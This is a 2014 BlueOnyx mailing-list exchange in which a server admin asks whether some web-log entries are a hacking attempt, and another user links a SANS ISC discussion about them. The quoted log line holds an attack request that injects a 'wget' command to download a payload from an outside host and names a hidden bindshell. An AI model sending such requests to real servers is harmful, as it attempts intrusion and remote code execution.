[BlueOnyx:15726] Re: Hacking attempt?
Alan Kline
alan at snugglebunny.us
Wed Jul 30 12:09:45 -05 2014
Thanks, Michael. Doesn't sound like any reason for panic...
Alan
On 7/30/2014 11:25 AM, Michael Stauber wrote:
> Hi Alan,
>
>> I've seen a number of entries on my system log that look similar to this:
>>
>> alan.snugglebunny.us 162.253.66.77 - - [28/Jul/2014:17:07:22 -0500] "GET
>> /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day;
>> HTTP/1.0" 200 14 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
>
> Got them as well yesterday. A quick Google search turned up this discussion:
>
> https://isc.sans.edu/forums/diary/Interesting+HTTP+User+Agent+chroot-apach0day+/18453
>
More information about the Blueonyx
mailing list